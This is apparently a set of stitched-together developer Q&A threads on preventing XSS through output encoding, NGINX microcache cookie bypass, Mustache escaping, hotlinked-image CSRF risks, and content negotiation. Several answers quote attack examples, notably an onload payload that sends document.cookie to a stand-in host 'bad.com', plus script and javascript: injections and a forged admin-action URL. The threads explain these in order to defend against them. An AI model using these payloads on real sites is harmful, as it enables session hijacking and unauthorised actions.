I want to know if entity-encoding the two characters < and > is enough to prevent XSS injection.
And if not, why? And what's the best solution?
It depends very much on context.
Check out this example, from a typical forum site...
You may hotlink your avatar image. Enter the full URL.
A malicious user enters this in the input field:
http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)
There are no less-than or greater-than characters in there to encode, yet it is still a big security hole.
As for htmlspecialchars(), I have found it a good idea to write (or use) a wrapper around it that casts the value to a string, makes it easy to disable double encoding when necessary, and ensures the correct character set for your application is used. Kohana has a great example.
You should also take double quotes ("), single quotes (') and ampersands (&) into account. If you do all of that while generating the output, then yes, it's enough.
You only need to ensure that you do this for any user-controlled input, such as request parameters, the request URL, request headers and user-controlled input which has been stored in a datastore.
In PHP you can do that with htmlspecialchars() and in JSP you can do that with JSTL <c:out>.
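As a rough sketch of such a wrapper (the function name e() and its defaults are illustrative assumptions, not Kohana's actual implementation):

<?php
// Illustrative wrapper around htmlspecialchars(); the name and defaults are assumptions.
function e($value, $double_encode = true)
{
    // Cast to string, encode both single and double quotes, and pin the character set.
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8', $double_encode);
}

// Usage while generating output:
$userInput = $_GET['value'] ?? '';
echo '<p data-id="' . e($userInput) . '">' . e($userInput) . '</p>';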
I am currently working on/testing the microcache feature in an NGINX reverse-proxy setup for dynamic content.
One big issue is sessions/cookies, which need to be ignored, otherwise people will end up logged on with random accounts on the site(s).
Currently I am ignoring popular CMS cookies like this:
if ($http_cookie ~* "(joomla_[a-zA-Z0-9_]+|userID|wordpress_(?!test_)[a-zA-Z0-9_]+|wp-postpass|wordpress_logged_in_[a-zA-Z0-9]+|comment_author_[a-zA-Z0-9_]+|woocommerce_cart_hash|woocommerce_items_in_cart|wp_woocommerce_session_[a-zA-Z0-9]+|sid_customer_|sid_admin_|PrestaShop-[a-zA-Z0-9]+")
{
# set ignore variable to 1
# later used in:
# proxy_no_cache $IGNORE_VARIABLE;
# proxy_cache_bypass $IGNORE_VARIABLE;
# makes sense ?
}
However, this becomes a problem if I want to add more cookies to the ignore list. Not to mention that using too many "if" statements in NGINX is not recommended, as per the docs.
My question is whether this could be done using a map block? I saw that the regex syntax in map is different (or maybe I am wrong).
Or is there another way to efficiently ignore/bypass cookies?
I have searched a lot on Stack Overflow, and while there are many different examples, I could not find something specific to my needs.
Thank you
Update:
After a lot of reading and "digging" on the internet (we might as well just say Google), I found quite a few interesting examples.
However, I am very confused by these, as I do not fully understand the regex usage, and I am afraid to implement something like this without understanding it.
Example 1:
map $http_cookie $cache_uid {
default nil;
~SESS[[:alnum:]]+=(?<session_id>[[:alnum:]]+) $session_id;
}
In this example I notice that the regex is very different from the ones used in "if" blocks. I don't understand why the pattern starts without any quotes and directly with just a ~ sign.
I don't understand what [[:alnum:]]+ means. I searched for this but was unable to find documentation (or maybe I missed it).
I can see that the author was setting "nil" as the default; this will not apply to my case.
Example 2:
map $http_cookie $cache_uid {
default '';
~SESS[[:alnum:]]+=(?<session_id>[[:graph:]]+) $session_id;
}
Same points as in Example 1, but this time I can see [[:graph:]]+. What is that?
My Example (not tested):
map $http_cookie $bypass_cache {
"~*wordpress_(?!test_)[a-zA-Z0-9_]+" 1;
"~*wp-postpass|wordpress_logged_in_[a-zA-Z0-9]+" 1;
"~*comment_author_[a-zA-Z0-9_]+" 1;
"~*[a-zA-Z0-9]+_session)" 1;
default 0;
}
In my pseudo-example the regexes may well be wrong, since I did not find any map cookie examples with such regexes.
So, once again, my goal is to have a map-style list of cookies that I can bypass the cache for, with proper regexes.
Any advice/examples much appreciated.
What exactly are you trying to do?
The way you're doing it, by trying to blacklist only certain cookies from being cached through if ($http_cookie …, is the wrong approach. It means that one day someone will find a cookie that is not blacklisted, but which your backend would nonetheless accept, and cause you cache poisoning or other security issues down the line.
There's also no reason to use the http://nginx.org/r/map approach to get the values of the individual cookies, either — all of this is already available through the http://nginx.org/r/$cookie_ paradigm, making the map code for parsing out $http_cookie rather redundant and unnecessary.
Are there any cookies which you actually want to cache? If not, why not just use proxy_no_cache $http_cookie; to disallow caching when any cookies are present?
What you'd probably want to do is first have a spec of what must be cached and under what circumstances, only then resorting to expressing such logic in a programming language like nginx.conf.
For example, a better approach would be to see which URLs should always be cached, clearing out the Cookie header to ensure that cache poisoning isn't possible (proxy_set_header Cookie "";). Else, if any cookies are present, it may either make sense to not cache anything at all (proxy_no_cache $http_cookie;), or to structure the cache such that certain combination of authentication credentials are used for http://nginx.org/r/proxy_cache_key; in this case, it might also make sense to reconstruct the Cookie request header manually through a whitelist-based approach to avoid cache-poisoning issues.
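To make the two options above concrete, a minimal sketch (the location patterns, the cache zone name "microcache" and the "backend" upstream are assumptions, not taken from the question; a matching proxy_cache_path and upstream block are assumed to exist elsewhere):

# URLs that must always be cached: drop the Cookie header entirely,
# so no cookie can poison the cached copy.
location /public/ {
    proxy_set_header Cookie "";
    proxy_cache microcache;
    proxy_pass http://backend;
}

# Everything else: never store, and never serve from cache, when any cookie is present.
location / {
    proxy_no_cache $http_cookie;
    proxy_cache_bypass $http_cookie;
    proxy_cache microcache;
    proxy_pass http://backend;
}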
Your 2nd example is what you actually need:
map $http_cookie $bypass_cache {
"~*wordpress_(?!test_)[a-zA-Z0-9_]+" 1;
"~*wp-postpass|wordpress_logged_in_[a-zA-Z0-9]+" 1;
"~*comment_author_[a-zA-Z0-9_]+" 1;
"~*[a-zA-Z0-9]+_session)" 1;
default 0;
}
Basically, what you are saying here is that the $bypass_cache value will be 1 if the regex matches, else 0.
So as long as you get the patterns right, it will work. And only you can build that list, since only you know which cookies to bypass the cache for.
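For completeness, a hedged sketch of how the mapped $bypass_cache value would then be wired into the proxy cache directives (the cache zone name and upstream are placeholders, not from the question):

location / {
    proxy_cache microcache;            # assumed cache zone
    proxy_no_cache $bypass_cache;      # don't store the response when a matching cookie is present
    proxy_cache_bypass $bypass_cache;  # don't serve it from the cache either
    proxy_pass http://backend;         # assumed upstream
}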
I was thinking about my app's XSS vulnerability. On the server side I don't sanitize either input or output, so
<script>alert(document.cookie)</script>
is stored in the database exactly like that. To view this value on the client side I use Mustache. If this script were executed by an admin, it would of course be easy to hijack his session. However, I've noticed that Mustache by default escapes these characters & \ " < > when you use the {{ }} syntax. Do I need to worry about XSS when the value from the database is inserted into
<p>{{value}}</p>
or even
<p data-id='{{value}}'>something</p>
? Should I perhaps review my Mustache templates to look for any vulnerable code, or am I safe as long as I don't use
<script>{{value}}</script>
anywhere?
Well, you should always worry :) But yes, Mustache accomplishes the goal you are talking about here, protecting your examples from XSS (except where you're outputting the value directly into a <script> tag).
Note: check that the Mustache implementation you're using escapes single quotes. It's apparently not in the spec to do so (https://github.com/mustache/spec/issues/69) but the major implementations thankfully escape it anyway.
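To make the distinction concrete, a small sketch using mustache.js (the template and data are illustrative, not taken from the question's code):

// Minimal mustache.js sketch; assumes `npm install mustache`.
const Mustache = require("mustache");

const value = "<script>alert(document.cookie)</script>";

// {{value}} escapes the output, so the payload comes out as inert text.
console.log(Mustache.render("<p>{{value}}</p>", { value }));

// {{{value}}} (triple mustache) turns escaping off and would re-open the XSS hole.
console.log(Mustache.render("<p>{{{value}}}</p>", { value }));

The same caveat applies to the ampersand unescape syntax, {{& value}}.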
On my site, I want to allow users to add references to images hosted anywhere on the internet. These images can then be seen by all users of my site. As far as I understand, this could open up the risk of cross-site scripting, as in the following scenario:
User A adds a link to a GIF which he hosts on his own webserver. This webserver is configured in such a way that it returns JavaScript instead of the image.
User B opens the page containing the image. Instead of seeing the image, JavaScript is executed.
My current security measures are such that all content is encoded, both on save and on display.
I am using ASP.NET (C#) on the server and a lot of jQuery on the client to build UI elements, including the generation of image tags.
Is this fear of mine correct? Am I missing any other important security loopholes here? And most important of all, how do I prevent this attack? The only secure way I can think of right now is to make a web request to the image URL from the server and check whether it contains anything other than binary data...
Checking that the file is indeed an image won't help. An attacker could return one thing when your server makes the request and something else when a potential victim makes the same request.
Having said that, as long as you restrict the URL to only ever be printed inside the src attribute of an img tag, you have a CSRF flaw, but not an XSS one.
Someone could for instance create an "image" URL along the lines of:
http://yoursite.com/admin/?action=create_user&un=bob&pw=alice
Or, more realistically but more annoyingly: http://yoursite.com/logout/
If all sensitive actions (logging out, editing profiles, creating posts, changing language/theme) have tokens, then an attack vector like this wouldn't give the user any benefit.
But going back to your question: unless there's some current browser bug I can't think of, you won't have XSS. Oh, and remember to ensure their image URL doesn't include odd characters, i.e. an image URL of "><script>alert(1)</script><!-- may obviously have bad effects. I presume you know to escape that.
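Since the question mentions ASP.NET (C#), here is a minimal sketch of what "escape that" looks like when emitting the tag (the variable names and the hostile URL are illustrative only):

using System;
using System.Web;  // requires a reference to System.Web

class HotlinkDemo
{
    static void Main()
    {
        // A hostile "URL" trying to break out of the src attribute.
        string userUrl = "http://www.example.com/image.png\" onload=\"alert(1)";

        // HTML-attribute-encode the value before placing it inside src="...".
        string imgTag = "<img src=\"" + HttpUtility.HtmlAttributeEncode(userUrl) + "\" alt=\"user image\" />";

        Console.WriteLine(imgTag);
        // The embedded double quote comes out encoded, so the attacker
        // cannot inject an onload attribute.
    }
}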
Your approach to security is incorrect.
Don't approach the topic as "I have user input, so how can I prevent XSS?" Rather, approach it like this: "I have user input; it should be as restrictive as possible, i.e. allowing nothing through by default." Then, based on that, allow only what is absolutely essential: plain-text strings thoroughly sanitized so that nothing but a URL gets through, and only the specific characters that URLs need. Once it is sanitized, you should only allow images. Testing for that is hard, because it can easily be tricked; however, it should still be tested for. Then, because you're using an input field, you should make sure that everything from JavaScript and escape characters to HTML, XML and SQL injection is converted to plain text and rendered harmless and useless. Consider your users as being both idiots and hackers: assume they'll input everything incorrectly and try to hack something into your input space.
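A rough C# sketch of that whitelist mindset (the allowed schemes and extensions are my assumptions; adjust them to your own policy, and remember the extension check alone proves nothing):

using System;
using System.Linq;

class ImageUrlWhitelist
{
    // Assumed policy: http/https only, plus a small set of image extensions.
    static readonly string[] AllowedExtensions = { ".png", ".jpg", ".jpeg", ".gif" };

    static bool IsAllowedImageUrl(string input)
    {
        // Must parse as an absolute URL.
        if (!Uri.TryCreate(input, UriKind.Absolute, out Uri uri))
            return false;

        // Reject anything that is not plain http or https (e.g. javascript:).
        if (uri.Scheme != Uri.UriSchemeHttp && uri.Scheme != Uri.UriSchemeHttps)
            return false;

        // Weak signal (servers can lie), but it narrows the allowed input further.
        return AllowedExtensions.Any(ext =>
            uri.AbsolutePath.EndsWith(ext, StringComparison.OrdinalIgnoreCase));
    }

    static void Main()
    {
        Console.WriteLine(IsAllowedImageUrl("http://example.com/cat.png")); // True
        Console.WriteLine(IsAllowedImageUrl("javascript:alert(1)"));        // False
    }
}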
Aside from that, you may run into some legal issues with regard to copyright. Copyrighted images generally may not be used on other people's sites without the copyright owner's consent and permission, usually obtained in writing (or email). So allowing users to simply lift images from a site runs the risk of them taking copyrighted material and reposting it on your site without permission, which is illegal. Some sites are okay with citing the source, others require a fee to be paid, and others will sue you and bring your whole domain down for copyright infringement.
I have a resource at a URL that both humans and machines should be able to read:
http://example.com/foo-collection/foo001
What is the best way to distinguish between human browsers and machines, and return either HTML or a domain-specific XML response?
(1) The Accept header field in the request?
(2) An additional bit of URL? e.g.:
http://example.com/foo-collection/foo001 -> returns HTML
http://example.com/foo-collection/foo001?xml -> returns, er, XML
I do not wish to oblige machines reading the resource to parse HTML (or XHTML, for that matter). Machines like the Googlebot should receive the HTML response.
It is reasonable to assume I control the machine readers.
If this is under your control, rather than adding a query parameter why not add a file extension:
http://example.com/foo-collection/foo001.html - return HTML
http://example.com/foo-collection/foo001.xml - return XML
Apart from anything else, that means if someone fetches it with wget or saves it from their browser, it'll have an appropriate filename without any fuss.
My preference is to make it a first-class part of the URI. This is debatable, since there are, in a sense, multiple URIs for the same resource. And is "format" really part of the URI?
http://example.com/foo-collection/html/foo001
http://example.com/foo-collection/xml/foo001
These are very easy to deal with in a web framework that has URI parsing to direct the request to the proper application.
If this is indeed the same resource with two different representations, HTTP invites you to use the Accept header, as you suggest. This is probably a very reliable way to distinguish between the two scenarios. You can be quite sure that user agents (including search engine spiders) send the Accept header properly.
As for the machine agents you are going to give XML to: are they under your control? In that case you can be doubly sure that Accept will work. If they do not set this header properly, you can serve XML as the default. User agents DO set the header properly.
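A rough sketch of what that looks like on the wire (the exact browser Accept value varies; the one shown is only an example):

A machine client under your control requests:
GET /foo-collection/foo001 HTTP/1.1
Host: example.com
Accept: application/xml

A browser or search engine spider sends something like:
GET /foo-collection/foo001 HTTP/1.1
Host: example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

The server then answers the first with Content-Type: application/xml and the second with Content-Type: text/html, at the same URL.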
I would try to use the Accept header for this, because this is exactly what the Accept header is there for.
The problem with having two different URLs is that it is not automatically apparent that they represent the same underlying resource. This can be bad if a user finds a URL in one program, which renders HTML, and pastes it into the other, which needs XML. At that point a smart user could probably change the URL appropriately, but this is just a source of error that you don't need.
I would say adding a query string parameter is your best bet. The only way to automatically detect whether your client is a browser (human) or an application would be to read the User-Agent string from the HTTP request. But since this is easily set by any application to mimic a browser, you're not guaranteed that it is going to work.
I'm using ASP.NET Web Forms for blog style comments.
Edit 1: This looks way more complicated than I first thought. How do you filter the src?
I would prefer to still use real HTML tags, but if things get too complicated that way, I might go a custom route. I haven't done any XML yet, so do I need to learn more about that?
If IMG is the only thing you'd allow, I'd suggest you use a simple square-bracket syntax to allow it. This would eliminate the need for a parser and avoid a load of other dangerous parser edge cases as well. Say, something like:
Look at this! [http://a.b.c/m.jpg]
Which would get converted to
Look at this! <img src="http://a.b.c/m.jpg" />
You should also filter the src address so that nothing malicious gets passed in the src part. Like maybe:
Look at this! [javascript:alert('pwned!')]
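A rough C# sketch of that conversion plus src filtering (the regex, the extension whitelist and the helper names are my assumptions, not a hardened implementation):

using System;
using System.Text.RegularExpressions;
using System.Web;  // requires a reference to System.Web

class BracketImages
{
    // Assumed policy: only http(s) URLs ending in a known image extension may become images.
    static readonly Regex ImageToken = new Regex(
        @"\[(https?://[^\s\]]+\.(?:png|jpe?g|gif))\]",
        RegexOptions.IgnoreCase);

    static string RenderComment(string comment)
    {
        // Escape everything first, then re-introduce only the img tags we build ourselves.
        string encoded = HttpUtility.HtmlEncode(comment);
        return ImageToken.Replace(encoded, m =>
            "<img src=\"" + HttpUtility.HtmlAttributeEncode(m.Groups[1].Value) + "\" />");
    }

    static void Main()
    {
        Console.WriteLine(RenderComment("Look at this! [http://a.b.c/m.jpg]"));
        Console.WriteLine(RenderComment("Look at this! [javascript:alert('pwned!')]")); // stays harmless text
    }
}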
Use an XML parser to validate your input, and drop or encode all elements and attributes that you do not want to allow. In this case, delete or encode all tags except the <img> tag, and all of its attributes except src, alt and title.
If you end up going with a non-HTML format (which makes things easier b/c you can literally escape all HTML), use a standard syntax like markdown. The markdown image syntax is ![alt text](/path/to/image.jpg)
There are others also, like Textile. Its syntax for images is !imageurl!
#chakrit suggested using a custom syntax, e.g. bracketed URLs - this might very well be the best solution. You DEFINITELY don't want to start messing with parsing, etc.
Just make sure you properly encode the entire comment (according to the context - see my answer on this here: Will HTML Encoding prevent all kinds of XSS attacks?)
(btw I just discovered a good example of custom syntax right there... ;-) )
As also mentioned, restrict the file extension to jpg/gif/etc. (even though this can be bypassed), and also restrict the protocol (e.g. http://).
Another issue to consider besides XSS is CSRF (http://www.owasp.org/index.php/Cross-Site_Request_Forgery). If you're not familiar with this security issue, it basically allows the attacker to force my browser to submit a valid authenticated request to your application, for instance to transfer money or to change my password. If this is hosted on your site, he can anonymously attack any vulnerable application - including yours. (Note that even if other applications are vulnerable, it's not your fault they get attacked, but you still don't want to be the exploit host or the source of the attack...) As far as your own site goes, it's that much easier for the attacker to change the user's password on your site, for instance.